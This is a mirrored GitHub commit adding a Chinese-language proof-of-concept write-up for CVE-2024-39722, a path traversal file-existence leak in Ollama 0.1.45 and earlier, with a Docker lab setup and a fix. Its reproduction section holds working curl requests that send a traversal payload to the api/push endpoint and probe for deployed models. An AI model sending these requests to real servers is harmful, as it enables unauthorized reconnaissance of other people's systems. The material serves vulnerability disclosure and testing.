mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
update CVE-2024-39722
This commit is contained in:
Threekiii
parent
85d69fdd68
commit
07b547e9e5
74
人工智能漏洞/Ollama 文件存在性泄露漏洞 CVE-2024-39722.md
Normal file
74
人工智能漏洞/Ollama 文件存在性泄露漏洞 CVE-2024-39722.md
Normal file
@ -0,0 +1,74 @@
|
|||||||
|
# Ollama 文件存在性泄露漏洞 CVE-2024-39722
|
||||||
|
|
||||||
|
## 漏洞描述
|
||||||
|
|
||||||
|
Ollama 0.1.45 及之前的版本中,攻击者可以通过 `api/push` 端点的路径遍历暴露服务器上存在的文件。
|
||||||
|
|
||||||
|
当调用 `api/push` 路由并提供一个不存在的路径参数时,服务器会将转义后的 `URI` 直接返回给攻击者,从而泄露目标服务器及执行该请求的用户的文件存在性信息,这一漏洞为攻击者提供了一种探测文件是否存在的手段。
|
||||||
|
|
||||||
|
参考链接:
|
||||||
|
|
||||||
|
- https://github.com/advisories/GHSA-cfxq-8762-vx3v
|
||||||
|
- https://oligosecurity.webflow.io/blog/more-models-more-probllms
|
||||||
|
|
||||||
|
## 漏洞影响
|
||||||
|
|
||||||
|
```
|
||||||
|
Ollama ≤ 0.1.45
|
||||||
|
Fixed in version 0.1.46
|
||||||
|
```
|
||||||
|
|
||||||
|
## 环境搭建
|
||||||
|
|
||||||
|
docker-compose.yml
|
||||||
|
|
||||||
|
```
|
||||||
|
services:
|
||||||
|
ollama:
|
||||||
|
image: ollama/ollama:0.1.45
|
||||||
|
container_name: ollama
|
||||||
|
volumes:
|
||||||
|
- ollama:/root/.ollama
|
||||||
|
ports:
|
||||||
|
- "11434:11434"
|
||||||
|
|
||||||
|
volumes:
|
||||||
|
ollama:
|
||||||
|
```
|
||||||
|
|
||||||
|
执行如下命令启动 Ollama 0.1.45 服务,并拉取任意一个模型,模拟真实部署环境,例如 `codegemma:2b` :
|
||||||
|
|
||||||
|
```
|
||||||
|
docker compose up -d
|
||||||
|
docker exec -it ollama ollama run codegemma:2b
|
||||||
|
```
|
||||||
|
|
||||||
|
环境启动后,访问 `http://your-ip:11434/`,此时 Ollma 0.1.45 已经成功运行。
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## 漏洞复现
|
||||||
|
|
||||||
|
通过 HTTP 暴露服务器目录结构:
|
||||||
|
|
||||||
|
```
|
||||||
|
curl http://your-ip:11434/api/push -d '{ "name": "../../../test../../../:../../../test../../../", "insecure": true, "stream": true }'
|
||||||
|
-----
|
||||||
|
{"status":"retrieving manifest"}
|
||||||
|
{"status":"couldn't retrieve manifest"}
|
||||||
|
{"error":"stat /root/.ollama/models/manifests/registry.ollama.ai/library/latest: no such file or directory"}
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
基于服务器目录结构,可探测部署的模型:
|
||||||
|
|
||||||
|
```
|
||||||
|
curl http://your-ip:11434/api/push -d '{ "name": "codegemma:2b", "insecure": true, "stream": true }'
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## 漏洞修复
|
||||||
|
|
||||||
|
- 升级至最新版本 https://github.com/ollama/ollama
|
||||||
Binary file not shown.
|
After Width: | Height: | Size: 51 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 133 KiB |
Loading…
x
Reference in New Issue
Block a user